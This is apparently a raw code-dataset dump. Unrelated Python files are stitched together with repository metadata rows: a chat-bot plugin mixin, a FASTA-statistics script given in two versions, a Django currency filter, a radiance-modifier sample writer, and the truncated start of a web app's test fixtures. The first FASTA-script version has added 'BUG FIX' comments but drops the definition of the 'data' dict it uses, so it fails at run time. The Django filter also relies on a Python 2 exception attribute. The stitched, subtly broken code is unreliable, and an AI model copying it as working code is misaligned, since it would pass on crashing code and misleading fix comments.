] | 18 | 2015-09-25T16:30:18.000Z | 2021-03-11T08:35:50.000Z | bot.py | youknowone/slairck | 2f6604c541610119dc1e48f4c1e33f3d639f0a48 | [
"MIT"
] | null | null | null | bot.py | youknowone/slairck | 2f6604c541610119dc1e48f4c1e33f3d639f0a48 | [
"MIT"
] | 3 | 2016-10-01T14:26:14.000Z | 2017-12-31T08:17:48.000Z | #!/usr/bin/env python
import sys
sys.dont_write_bytecode = True
import glob
import os
import sys
import logging
from plugin import Plugin
from util import dbg
# except:
# print "error loading plugin %s" % name
| 28.564516 | 80 | 0.555618 | #!/usr/bin/env python
import sys
sys.dont_write_bytecode = True
import glob
import os
import sys
import logging
from plugin import Plugin
from util import dbg
class BotMixin(object):
    """Plugin-hosting mixin shared by the chat-protocol bots.

    NOTE(review): relies on the host class providing self.bot_plugins,
    self.relay_outs, self.plugin (plugin directory name), self.config and
    self.send_item() — confirm against the concrete bot classes.
    """
    def output(self):
        # Forward every pending plugin output to the chat service.
        for plugin in self.bot_plugins:
            for output in plugin.do_output():
                self.send_item(output)
    def collect_relay(self):
        # Drain this bot's queued relay items plus each plugin's, returning
        # them for delivery to the peer bot.
        items = self.relay_outs
        self.relay_outs = []
        for plugin in self.bot_plugins:
            items += plugin.do_relay_out()
        return items
    def relay(self, bot, relay_ins):
        # Dispatch each typed relay message to every plugin as a
        # "relay_<type>" handler call.
        for data in relay_ins:
            if "type" in data:
                function_name = "relay_" + data["type"]
                dbg("got {}".format(function_name))
                for plugin in self.bot_plugins:
                    # NOTE(review): register_jobs() runs once per relayed
                    # message per plugin — verify it is idempotent.
                    plugin.register_jobs()
                    plugin.do(function_name, bot, data)
    def crons(self):
        # Give every plugin a chance to run its scheduled jobs.
        for plugin in self.bot_plugins:
            plugin.do_jobs()
    def load_plugins(self):
        # Discover plugin modules under <script dir>/<self.plugin>/, extend
        # sys.path so they can be imported, and instantiate each one.
        directory = os.path.dirname(sys.argv[0])
        if not directory.startswith('/'):
            directory = os.path.abspath(
                "{}/{}".format(os.getcwd(), directory))
        prefix = directory + '/' + self.plugin + '/'
        for plugin in glob.glob(prefix + '*'):
            sys.path.insert(0, plugin)
        sys.path.insert(0, prefix)
        for plugin in glob.glob(prefix + '*.py') + glob.glob(prefix + '*/*.py'):
            logging.info(plugin)
            # Module name = file name without the '.py' suffix.
            name = plugin.split('/')[-1][:-3]
            # try:
            print('load plugin: {} {}'.format(self.__class__.__name__, name))
            self.bot_plugins.append(Plugin(name, self.config))
            # except:
            #     print "error loading plugin %s" % name
| 1,371 | 2 | 158 |
4204585ad53350e42a2e913ae0610f3b7f99fb69 | 4,769 | py | Python | fa-stats.py | alrojascr/Virus-Data-Curation | efc2584172c7524f8548693c889906e523ca91ef | [
"MIT"
] | null | null | null | fa-stats.py | alrojascr/Virus-Data-Curation | efc2584172c7524f8548693c889906e523ca91ef | [
"MIT"
] | null | null | null | fa-stats.py | alrojascr/Virus-Data-Curation | efc2584172c7524f8548693c889906e523ca91ef | [
"MIT"
] | null | null | null | from Bio.SeqIO.FastaIO import FastaIterator, FastaWriter
import argparse
import statistics
import sys
import os

# Command-line interface: input fasta files, output name, sort order, verbosity.
parser = argparse.ArgumentParser(epilog='''''',
                                 description='This script runs the statistics of different fasta files',
                                 formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--files', nargs='*', help='Fasta files. Select all fasta files you need to process separated by a space', required=True)
parser.add_argument('-o', '--output', default='sorted.fasta', help='Output name. This name will be used for two files: '
                    'output.fasta: it contains the sorted sequences '
                    'output.log: it contains a table with all info')
parser.add_argument('-s', '--sort', default=0, choices=[0, 1], type=int, help='Output order. 0- ascendant, 1- descendent')
parser.add_argument('-p', '--print', default=1, choices=[0, 1, 2, 3], type=int,
                    help='Define how much info is printed. 0- Print only the summary, 1- Print the longest and shortest'
                    ' record per-file, 2- Print the shortest and longest record per-file and 3- Print all stats data for each record and file')
args = parser.parse_args(sys.argv[1:])
# print(args)
# this is the output file for multifasta
sorted_h = open(args.output, "w")
# BUG FIX: the --output help text promises a log named after the output file,
# but the log path was hard-coded to 'log.log'; derive it from args.output.
log = open(os.path.splitext(args.output)[0] + '.log', 'w')
log.write(' ID | LENGTH | SEQ ID | FILE \n')
# fasta output file handler
gwriter = FastaWriter(sorted_h)
stotal = 0
gfsmax = 0
gfsmin = 99999999999
grec_max = []
grec_min = []
gfasta_legth = []
nfiles = 0
# Open the multifasta file
for cfile in args.files:
nfiles += 1
if args.print >= 1:
print(80 * '=')
print(f'Processing {cfile}...')
ftotal = 0
with open(cfile) as fastafile:
rec_max = None
rec_min = None
fasta_legth = []
fsmax = 0
fsmin = 99999999999
for record in FastaIterator(fastafile):
stotal += 1
ftotal += 1
cl = len(record.seq)
fasta_legth.append(cl)
if cl > fsmax:
fsmax = cl
rec_max = record
if cl < fsmin:
fsmin = cl
rec_min = record
if cl > gfsmax:
gfsmax = cl
grec_max = [cfile, record]
if cl < gfsmin:
gfsmin = cl
grec_min = [cfile, record]
if args.print == 3:
print(80 * '-')
print(record)
print(80 * '-')
print('Length: ', cl)
data[stotal] = [cl, cfile, record]
gfasta_legth.extend(fasta_legth)
mean = round(sum(fasta_legth) / len(fasta_legth), 0)
if args.print >= 1:
print('')
print(30 * '*' + ' File Summary ' + 30 * '*')
print(f'Number of records: {ftotal}')
print(f'The average sequences length: {mean}')
print(30 * '_')
print(f'Longest record length: {fsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest record: {rec_max}')
print(30 * '_')
print(f'Shortest record length: {fsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest record: {rec_min}')
print(30 * '_')
print('')
# Sort all records by length: ascending by default, descending with -s 1.
if args.sort:
    ordered_list = sorted(data.items(), key=lambda x: x[1][0], reverse=True)
else:
    ordered_list = sorted(data.items(), key=lambda x: x[1][0])
# Write the sorted records to the fasta output and one table row per record
# to the log file.
c = 1
for gid, rlist in ordered_list:
    log.write('{:5d} | {:6d} | {:40s} | {:20s}\n'.format(c, rlist[0], rlist[2].id, rlist[1]))
    gwriter.write_record(rlist[2])
    c += 1
# BUG FIX: the log handle was never closed, so its buffered contents could be
# lost on abnormal exit; close it as soon as writing is finished.
log.close()
gmean = round(sum(gfasta_legth) / len(gfasta_legth), 0)
# close the output files
sorted_h.close()
print(80 * '#' + '\n')
print(32 * '#' + ' Summary ' + 32 * '#')
print(f'Number of files: {nfiles}')
print(f'Number of records: {stotal}')
print(f'The average sequences length: {gmean}')
print(30 * '_')
print(f'Longest global record length: {gfsmax}')
if args.print >= 2:
    print(30 * '-')
    print(f'Longest global record file: {grec_max[0]}')
    print(f'Longest global record: \n{grec_max[1]}')
print(30 * '_')
print(f'Shortest global record length: {gfsmin}')
if args.print >= 2:
    print(30 * '-')
    print(f'Shortest global record file: {grec_min[0]}')
    print(f'Shortest global record: \n{grec_min[1]}')
| 33.822695 | 185 | 0.531558 | from Bio.SeqIO.FastaIO import FastaIterator, FastaWriter
import argparse
import statistics
import sys
parser = argparse.ArgumentParser(epilog='''''',
description='This script runs the statistics of different fasta files',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--files', nargs='*', help='Fasta files. Select all fasta files you need to process separated by a space', required=True)
parser.add_argument('-o', '--output', default='sorted.fasta', help='Output name. This name will be used for two files: '
'output.fasta: it contains the sorted sequences '
'output.log: it contains a table with all info')
parser.add_argument('-s', '--sort', default=0, choices=[0, 1], type=int, help='Output order. 0- ascendant, 1- descendent')
parser.add_argument('-p', '--print', default=1, choices=[0, 1, 2, 3], type=int,
help='Define how much info is printed. 0- Print only the summary, 1- Print the longest and shortest'
' record per-file, 2- Print the shortest and longest record per-file and 3- Print all stats data for each record and file')
args = parser.parse_args(sys.argv[1:])
# print(args)
# this is the output file for multifasta
sorted_h = open(args.output, "w")
log = open('log.log', 'w')
log.write(' ID | LENGTH | SEQ ID | FILE \n')
# fasta output file handler
gwriter = FastaWriter(sorted_h)
data = {}
stotal = 0
gfsmax = 0
gfsmin = 99999999999
grec_max = []
grec_min = []
gfasta_legth = []
nfiles = 0
# Open the multifasta file
for cfile in args.files:
nfiles += 1
if args.print >= 1:
print(80 * '=')
print(f'Processing {cfile}...')
ftotal = 0
with open(cfile) as fastafile:
rec_max = None
rec_min = None
fasta_legth = []
fsmax = 0
fsmin = 99999999999
for record in FastaIterator(fastafile):
stotal += 1
ftotal += 1
cl = len(record.seq)
fasta_legth.append(cl)
if cl > fsmax:
fsmax = cl
rec_max = record
if cl < fsmin:
fsmin = cl
rec_min = record
if cl > gfsmax:
gfsmax = cl
grec_max = [cfile, record]
if cl < gfsmin:
gfsmin = cl
grec_min = [cfile, record]
if args.print == 3:
print(80 * '-')
print(record)
print(80 * '-')
print('Length: ', cl)
data[stotal] = [cl, cfile, record]
gfasta_legth.extend(fasta_legth)
mean = round(sum(fasta_legth) / len(fasta_legth), 0)
if args.print >= 1:
print('')
print(30 * '*' + ' File Summary ' + 30 * '*')
print(f'Number of records: {ftotal}')
print(f'The average sequences length: {mean}')
print(30 * '_')
print(f'Longest record length: {fsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest record: {rec_max}')
print(30 * '_')
print(f'Shortest record length: {fsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest record: {rec_min}')
print(30 * '_')
print('')
if args.sort:
ordered_list = sorted(data.items(), key=lambda x: x[1][0], reverse=True)
else:
ordered_list = sorted(data.items(), key=lambda x: x[1][0])
c = 1
for gid, rlist in ordered_list:
log.write('{:5d} | {:6d} | {:40s} | {:20s}\n'.format(c, rlist[0], rlist[2].id, rlist[1]))
gwriter.write_record(rlist[2])
c += 1
gmean = round(sum(gfasta_legth) / len(gfasta_legth), 0)
# close the output files
sorted_h.close()
print(80 * '#' + '\n')
print(32 * '#' + ' Summary ' + 32 * '#')
print(f'Number of files: {nfiles}')
print(f'Number of records: {stotal}')
print(f'The average sequences length: {gmean}')
print(30 * '_')
print(f'Longest global record length: {gfsmax}')
if args.print >= 2:
print(30 * '-')
print(f'Longest global record file: {grec_max[0]}')
print(f'Longest global record: \n{grec_max[1]}')
print(30 * '_')
print(f'Shortest global record length: {gfsmin}')
if args.print >= 2:
print(30 * '-')
print(f'Shortest global record file: {grec_min[0]}')
print(f'Shortest global record: \n{grec_min[1]}')
print(30 * '_')
| 0 | 0 | 0 |
d2f19d479c40e47557ab06c7a9bc142cd42c1db7 | 544 | py | Python | django/alumnos/Equipo 14/doorstep/catalog/templatetags/catalog_filters.py | R3SWebDevelopment/CeroUnoApprenticeshipProgramPython | b00b3dce329240889401627e99b72d3d9cadb7d9 | [
"MIT"
] | 1 | 2019-11-29T21:34:42.000Z | 2019-11-29T21:34:42.000Z | django/alumnos/Equipo 14/doorstep/catalog/templatetags/catalog_filters.py | R3SWebDevelopment/CeroUnoApprenticeshipProgramPython | b00b3dce329240889401627e99b72d3d9cadb7d9 | [
"MIT"
] | null | null | null | django/alumnos/Equipo 14/doorstep/catalog/templatetags/catalog_filters.py | R3SWebDevelopment/CeroUnoApprenticeshipProgramPython | b00b3dce329240889401627e99b72d3d9cadb7d9 | [
"MIT"
] | 1 | 2019-11-30T17:51:50.000Z | 2019-11-30T17:51:50.000Z | from django import template
from django.core.exceptions import ImproperlyConfigured
register = template.Library()
@register.filter(name='currency')
def currency(price, currency):
"""
Returns price in currency format
"""
price = float(price)
price *= float(currency.exchange_rate)
try:
return currency.display_format.format(price)
except Exception as e:
raise ImproperlyConfigured('Invalid currency format string: "%s" for currency "%s". %s' % (currency.display_format, currency.name, e.message)) | 30.222222 | 150 | 0.715074 | from django import template
from django.core.exceptions import ImproperlyConfigured
register = template.Library()
@register.filter(name='currency')
def currency(price, currency):
"""
Returns price in currency format
"""
price = float(price)
price *= float(currency.exchange_rate)
try:
return currency.display_format.format(price)
except Exception as e:
raise ImproperlyConfigured('Invalid currency format string: "%s" for currency "%s". %s' % (currency.display_format, currency.name, e.message)) | 0 | 0 | 0 |
6f46bf3c71b5dac925eba35bde1f26a5dc219d78 | 3,075 | py | Python | scripts/sample_modifier.py | MingboPeng/honeybee-schema | 84bfea4c4ed038e3cf71ae2d708b937cb98334d5 | [
"BSD-3-Clause"
] | null | null | null | scripts/sample_modifier.py | MingboPeng/honeybee-schema | 84bfea4c4ed038e3cf71ae2d708b937cb98334d5 | [
"BSD-3-Clause"
] | null | null | null | scripts/sample_modifier.py | MingboPeng/honeybee-schema | 84bfea4c4ed038e3cf71ae2d708b937cb98334d5 | [
"BSD-3-Clause"
] | null | null | null | # coding=utf-8
from __future__ import division
from honeybee_radiance.modifier.material import Trans, Light, BSDF
from honeybee_radiance.lib.modifiers import generic_wall, generic_ceiling, \
black, generic_exterior_window, air_boundary, white_glow
import os
import json
# run all functions within the file
master_dir = os.path.split(os.path.dirname(__file__))[0]
sample_directory = os.path.join(master_dir, 'samples', 'modifier')
modifier_plastic_generic_wall(sample_directory)
modifier_plastic_generic_ceiling(sample_directory)
modifier_plastic_black(sample_directory)
modifier_glass_generic_exterior_window(sample_directory)
modifier_glass_air_boundary(sample_directory)
modifier_trans_tree_foliage(sample_directory)
modifier_glow_white(sample_directory)
modifier_light_green_spotlight(sample_directory)
#modifier_bsdf_klemsfull(sample_directory)
| 36.176471 | 89 | 0.761301 | # coding=utf-8
from __future__ import division
from honeybee_radiance.modifier.material import Trans, Light, BSDF
from honeybee_radiance.lib.modifiers import generic_wall, generic_ceiling, \
black, generic_exterior_window, air_boundary, white_glow
import os
import json
def modifier_plastic_generic_wall(directory):
dest_file = os.path.join(directory, 'modifier_plastic_generic_wall.json')
with open(dest_file, 'w') as fp:
json.dump(generic_wall.to_dict(), fp, indent=4)
def modifier_plastic_generic_ceiling(directory):
dest_file = os.path.join(directory, 'modifier_plastic_generic_ceiling.json')
with open(dest_file, 'w') as fp:
json.dump(generic_ceiling.to_dict(), fp, indent=4)
def modifier_plastic_black(directory):
dest_file = os.path.join(directory, 'modifier_plastic_black.json')
with open(dest_file, 'w') as fp:
json.dump(black.to_dict(), fp, indent=4)
def modifier_glass_generic_exterior_window(directory):
dest_file = os.path.join(directory, 'modifier_glass_generic_exterior_window.json')
with open(dest_file, 'w') as fp:
json.dump(generic_exterior_window.to_dict(), fp, indent=4)
def modifier_glass_air_boundary(directory):
dest_file = os.path.join(directory, 'modifier_glass_air_boundary.json')
with open(dest_file, 'w') as fp:
json.dump(air_boundary.to_dict(), fp, indent=4)
def modifier_trans_tree_foliage(directory):
tree_leaves = Trans.from_single_reflectance('Foliage_0.3', 0.3, 0.0, 0.1, 0.15, 0.15)
dest_file = os.path.join(directory, 'modifier_trans_tree_foliage.json')
with open(dest_file, 'w') as fp:
json.dump(tree_leaves.to_dict(), fp, indent=4)
def modifier_glow_white(directory):
dest_file = os.path.join(directory, 'modifier_glow_white.json')
with open(dest_file, 'w') as fp:
json.dump(white_glow.to_dict(), fp, indent=4)
def modifier_light_green_spotlight(directory):
green_spot = Light('Green_Spotlight', 0, 1, 0)
dest_file = os.path.join(directory, 'modifier_light_green_spotlight.json')
with open(dest_file, 'w') as fp:
json.dump(green_spot.to_dict(), fp, indent=4)
def modifier_bsdf_klemsfull(directory):
relative_path = './scripts/bsdf/klemsfull.xml'
klemsfull = BSDF(relative_path)
dest_file = os.path.join(directory, 'modifier_bsdf_klemsfull.json')
json.dumps(klemsfull.to_dict(), indent=4)
with open(dest_file, 'w') as fp:
json.dump(klemsfull.to_dict(), fp, indent=4)
# run all functions within the file
master_dir = os.path.split(os.path.dirname(__file__))[0]
sample_directory = os.path.join(master_dir, 'samples', 'modifier')
modifier_plastic_generic_wall(sample_directory)
modifier_plastic_generic_ceiling(sample_directory)
modifier_plastic_black(sample_directory)
modifier_glass_generic_exterior_window(sample_directory)
modifier_glass_air_boundary(sample_directory)
modifier_trans_tree_foliage(sample_directory)
modifier_glow_white(sample_directory)
modifier_light_green_spotlight(sample_directory)
#modifier_bsdf_klemsfull(sample_directory)
| 2,000 | 0 | 207 |
76da5b0030b41814faabffaaec3631f341ee9dfb | 24,628 | py | Python | app/backend/src/tests/test_fixtures.py | Zenpanic/couchers | 2e742a2b55eaed3497844efcfe1ee237cc66478c | [
"MIT"
] | null | null | null | app/backend/src/tests/test_fixtures.py | Zenpanic/couchers | 2e742a2b55eaed3497844efcfe1ee237cc66478c | [
"MIT"
] | null | null | null | app/backend/src/tests/test_fixtures.py | Zenpanic/couchers | 2e742a2b55eaed3497844efcfe1ee237cc66478c | [
"MIT"
] | null | null | null | import os
from concurrent import futures
from contextlib import contextmanager
from datetime import date
from pathlib import Path
from unittest.mock import patch
import grpc
import pytest
from sqlalchemy.sql import or_, text
from couchers.config import config
from couchers.constants import GUIDELINES_VERSION, TOS_VERSION
from couchers.crypto import random_hex
from couchers.db import get_engine, session_scope
from couchers.interceptors import AuthValidatorInterceptor, _try_get_and_update_user_details
from couchers.models import (
Base,
FriendRelationship,
FriendStatus,
Language,
LanguageAbility,
LanguageFluency,
Region,
RegionLived,
RegionVisited,
User,
UserBlock,
UserSession,
)
from couchers.servicers.account import Account
from couchers.servicers.admin import Admin
from couchers.servicers.api import API
from couchers.servicers.auth import Auth, create_session
from couchers.servicers.blocking import Blocking
from couchers.servicers.bugs import Bugs
from couchers.servicers.communities import Communities
from couchers.servicers.conversations import Conversations
from couchers.servicers.discussions import Discussions
from couchers.servicers.donations import Donations, Stripe
from couchers.servicers.events import Events
from couchers.servicers.groups import Groups
from couchers.servicers.jail import Jail
from couchers.servicers.media import Media, get_media_auth_interceptor
from couchers.servicers.notifications import Notifications
from couchers.servicers.pages import Pages
from couchers.servicers.references import References
from couchers.servicers.reporting import Reporting
from couchers.servicers.requests import Requests
from couchers.servicers.resources import Resources
from couchers.servicers.search import Search
from couchers.servicers.threads import Threads
from couchers.sql import couchers_select as select
from couchers.utils import create_coordinate, now
from proto import (
account_pb2_grpc,
admin_pb2_grpc,
api_pb2_grpc,
auth_pb2_grpc,
blocking_pb2_grpc,
bugs_pb2_grpc,
communities_pb2_grpc,
conversations_pb2_grpc,
discussions_pb2_grpc,
donations_pb2_grpc,
events_pb2_grpc,
groups_pb2_grpc,
jail_pb2_grpc,
media_pb2_grpc,
notifications_pb2_grpc,
pages_pb2_grpc,
references_pb2_grpc,
reporting_pb2_grpc,
requests_pb2_grpc,
resources_pb2_grpc,
search_pb2_grpc,
stripe_pb2_grpc,
threads_pb2_grpc,
)
def drop_all():
"""drop everything currently in the database"""
with session_scope() as session:
# postgis is required for all the Geographic Information System (GIS) stuff
# pg_trgm is required for trigram based search
# btree_gist is required for gist-based exclusion constraints
session.execute(
text(
"DROP SCHEMA public CASCADE; DROP SCHEMA IF EXISTS logging CASCADE; CREATE SCHEMA public; CREATE SCHEMA logging; CREATE EXTENSION postgis; CREATE EXTENSION pg_trgm; CREATE EXTENSION btree_gist;"
)
)
def create_schema_from_models():
"""
Create everything from the current models, not incrementally
through migrations.
"""
# create the slugify function
functions = Path(__file__).parent / "slugify.sql"
with open(functions) as f, session_scope() as session:
session.execute(text(f.read()))
Base.metadata.create_all(get_engine())
def populate_testing_resources(session):
"""
Testing version of couchers.resources.copy_resources_to_database
"""
regions = [
("AUS", "Australia"),
("CAN", "Canada"),
("CHE", "Switzerland"),
("CUB", "Cuba"),
("CXR", "Christmas Island"),
("CZE", "Czechia"),
("DEU", "Germany"),
("EGY", "Egypt"),
("ESP", "Spain"),
("EST", "Estonia"),
("FIN", "Finland"),
("FRA", "France"),
("GBR", "United Kingdom"),
("GEO", "Georgia"),
("GHA", "Ghana"),
("GRC", "Greece"),
("HKG", "Hong Kong"),
("IRL", "Ireland"),
("ISR", "Israel"),
("ITA", "Italy"),
("JPN", "Japan"),
("LAO", "Laos"),
("MEX", "Mexico"),
("MMR", "Myanmar"),
("NAM", "Namibia"),
("NLD", "Netherlands"),
("NZL", "New Zealand"),
("POL", "Poland"),
("PRK", "North Korea"),
("REU", "Réunion"),
("SGP", "Singapore"),
("SWE", "Sweden"),
("THA", "Thailand"),
("TUR", "Turkey"),
("TWN", "Taiwan"),
("USA", "United States"),
("VNM", "Vietnam"),
]
languages = [
("arb", "Arabic (Standard)"),
("deu", "German"),
("eng", "English"),
("fin", "Finnish"),
("fra", "French"),
("heb", "Hebrew"),
("hun", "Hungarian"),
("jpn", "Japanese"),
("pol", "Polish"),
("swe", "Swedish"),
("cmn", "Chinese (Mandarin)"),
]
with open(Path(__file__).parent / ".." / ".." / "resources" / "timezone_areas.sql-fake", "r") as f:
tz_sql = f.read()
for code, name in regions:
session.add(Region(code=code, name=name))
for code, name in languages:
session.add(Language(code=code, name=name))
session.execute(text(tz_sql))
def recreate_database():
"""
Connect to a running Postgres database, build it using metadata.create_all()
"""
# running in non-UTC catches some timezone errors
os.environ["TZ"] = "America/New_York"
# drop everything currently in the database
drop_all()
# create everything from the current models, not incrementally through migrations
create_schema_from_models()
with session_scope() as session:
populate_testing_resources(session)
@pytest.fixture()
def db():
"""
Pytest fixture to connect to a running Postgres database and build it using metadata.create_all()
"""
recreate_database()
def generate_user(*, make_invisible=False, **kwargs):
"""
Create a new user, return session token
The user is detached from any session, and you can access its static attributes, but you can't modify it
Use this most of the time
"""
auth = Auth()
with session_scope() as session:
# default args
username = "test_user_" + random_hex(16)
user_opts = {
"username": username,
"email": f"{username}@dev.couchers.org",
# password is just 'password'
# this is hardcoded because the password is slow to hash (so would slow down tests otherwise)
"hashed_password": b"$argon2id$v=19$m=65536,t=2,p=1$4cjGg1bRaZ10k+7XbIDmFg$tZG7JaLrkfyfO7cS233ocq7P8rf3znXR7SAfUt34kJg",
"name": username.capitalize(),
"city": "Testing city",
"hometown": "Test hometown",
"community_standing": 0.5,
"birthdate": date(year=2000, month=1, day=1),
"gender": "N/A",
"pronouns": "",
"occupation": "Tester",
"education": "UST(esting)",
"about_me": "I test things",
"my_travels": "Places",
"things_i_like": "Code",
"about_place": "My place has a lot of testing paraphenelia",
"additional_information": "I can be a bit testy",
# you need to make sure to update this logic to make sure the user is jailed/not on request
"accepted_tos": TOS_VERSION,
"accepted_community_guidelines": GUIDELINES_VERSION,
"geom": create_coordinate(40.7108, -73.9740),
"geom_radius": 100,
"onboarding_emails_sent": 1,
"last_onboarding_email_sent": now(),
"new_notifications_enabled": True,
}
for key, value in kwargs.items():
user_opts[key] = value
user = User(**user_opts)
session.add(user)
session.flush()
session.add(RegionVisited(user_id=user.id, region_code="CHE"))
session.add(RegionVisited(user_id=user.id, region_code="REU"))
session.add(RegionVisited(user_id=user.id, region_code="FIN"))
session.add(RegionLived(user_id=user.id, region_code="ESP"))
session.add(RegionLived(user_id=user.id, region_code="FRA"))
session.add(RegionLived(user_id=user.id, region_code="EST"))
session.add(LanguageAbility(user_id=user.id, language_code="fin", fluency=LanguageFluency.fluent))
session.add(LanguageAbility(user_id=user.id, language_code="fra", fluency=LanguageFluency.beginner))
# this expires the user, so now it's "dirty"
session.commit()
token, _ = create_session(_DummyContext(), session, user, False)
# deleted user aborts session creation, hence this follows and necessitates a second commit
if make_invisible:
user.is_deleted = True
session.commit()
# refresh it, undoes the expiry
session.refresh(user)
# allows detaches the user from the session, allowing its use outside this session
session.expunge(user)
return user, token
# This doubles as get_FriendRequest, since a friend request is just a pending friend relationship
class CookieMetadataPlugin(grpc.AuthMetadataPlugin):
"""
Injects the right `cookie: couchers-sesh=...` header into the metadata
"""
@contextmanager
def auth_api_session():
"""
Create an Auth API for testing
This needs to use the real server since it plays around with headers
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor)
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
auth_pb2_grpc.add_AuthServicer_to_server(Auth(), server)
server.start()
try:
with grpc.secure_channel(f"localhost:{port}", grpc.local_channel_credentials()) as channel:
metadata_interceptor = _MetadataKeeperInterceptor()
channel = grpc.intercept_channel(channel, metadata_interceptor)
yield auth_pb2_grpc.AuthStub(channel), metadata_interceptor
finally:
server.stop(None).wait()
@contextmanager
def api_session(token):
"""
Create an API for testing, uses the token for auth
"""
channel = fake_channel(token)
api_pb2_grpc.add_APIServicer_to_server(API(), channel)
yield api_pb2_grpc.APIStub(channel)
@contextmanager
def real_api_session(token):
"""
Create an API for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
api_pb2_grpc.add_APIServicer_to_server(API(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield api_pb2_grpc.APIStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def real_admin_session(token):
"""
Create a Admin service for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
admin_pb2_grpc.add_AdminServicer_to_server(Admin(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield admin_pb2_grpc.AdminStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def real_jail_session(token):
"""
Create a Jail service for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
jail_pb2_grpc.add_JailServicer_to_server(Jail(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield jail_pb2_grpc.JailStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def conversations_session(token):
"""
Create a Conversations API for testing, uses the token for auth
"""
channel = fake_channel(token)
conversations_pb2_grpc.add_ConversationsServicer_to_server(Conversations(), channel)
yield conversations_pb2_grpc.ConversationsStub(channel)
@contextmanager
def requests_session(token):
"""
Create a Requests API for testing, uses the token for auth
"""
channel = fake_channel(token)
requests_pb2_grpc.add_RequestsServicer_to_server(Requests(), channel)
yield requests_pb2_grpc.RequestsStub(channel)
@contextmanager
@contextmanager
@contextmanager
@contextmanager
def real_stripe_session():
"""
Create a Stripe service for testing, using TCP sockets
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
stripe_pb2_grpc.add_StripeServicer_to_server(Stripe(), server)
server.start()
creds = grpc.local_channel_credentials()
try:
with grpc.secure_channel(f"localhost:{port}", creds) as channel:
yield stripe_pb2_grpc.StripeStub(channel)
finally:
server.stop(None).wait()
@contextmanager
@contextmanager
@contextmanager
@contextmanager
@contextmanager
@contextmanager
def account_session(token):
"""
Create a Account API for testing, uses the token for auth
"""
channel = fake_channel(token)
account_pb2_grpc.add_AccountServicer_to_server(Account(), channel)
yield account_pb2_grpc.AccountStub(channel)
@contextmanager
def search_session(token):
"""
Create a Search API for testing, uses the token for auth
"""
channel = fake_channel(token)
search_pb2_grpc.add_SearchServicer_to_server(Search(), channel)
yield search_pb2_grpc.SearchStub(channel)
@contextmanager
def references_session(token):
"""
Create a References API for testing, uses the token for auth
"""
channel = fake_channel(token)
references_pb2_grpc.add_ReferencesServicer_to_server(References(), channel)
yield references_pb2_grpc.ReferencesStub(channel)
@contextmanager
@contextmanager
@contextmanager
@contextmanager
@contextmanager
def media_session(bearer_token):
"""
Create a fresh Media API for testing, uses the bearer token for media auth
"""
media_auth_interceptor = get_media_auth_interceptor(bearer_token)
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[media_auth_interceptor])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
servicer = Media()
media_pb2_grpc.add_MediaServicer_to_server(servicer, server)
server.start()
call_creds = grpc.access_token_call_credentials(bearer_token)
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield media_pb2_grpc.MediaStub(channel)
finally:
server.stop(None).wait()
@pytest.fixture()
@pytest.fixture
| 32.793609 | 210 | 0.683775 | import os
from concurrent import futures
from contextlib import contextmanager
from datetime import date
from pathlib import Path
from unittest.mock import patch
import grpc
import pytest
from sqlalchemy.sql import or_, text
from couchers.config import config
from couchers.constants import GUIDELINES_VERSION, TOS_VERSION
from couchers.crypto import random_hex
from couchers.db import get_engine, session_scope
from couchers.interceptors import AuthValidatorInterceptor, _try_get_and_update_user_details
from couchers.models import (
Base,
FriendRelationship,
FriendStatus,
Language,
LanguageAbility,
LanguageFluency,
Region,
RegionLived,
RegionVisited,
User,
UserBlock,
UserSession,
)
from couchers.servicers.account import Account
from couchers.servicers.admin import Admin
from couchers.servicers.api import API
from couchers.servicers.auth import Auth, create_session
from couchers.servicers.blocking import Blocking
from couchers.servicers.bugs import Bugs
from couchers.servicers.communities import Communities
from couchers.servicers.conversations import Conversations
from couchers.servicers.discussions import Discussions
from couchers.servicers.donations import Donations, Stripe
from couchers.servicers.events import Events
from couchers.servicers.groups import Groups
from couchers.servicers.jail import Jail
from couchers.servicers.media import Media, get_media_auth_interceptor
from couchers.servicers.notifications import Notifications
from couchers.servicers.pages import Pages
from couchers.servicers.references import References
from couchers.servicers.reporting import Reporting
from couchers.servicers.requests import Requests
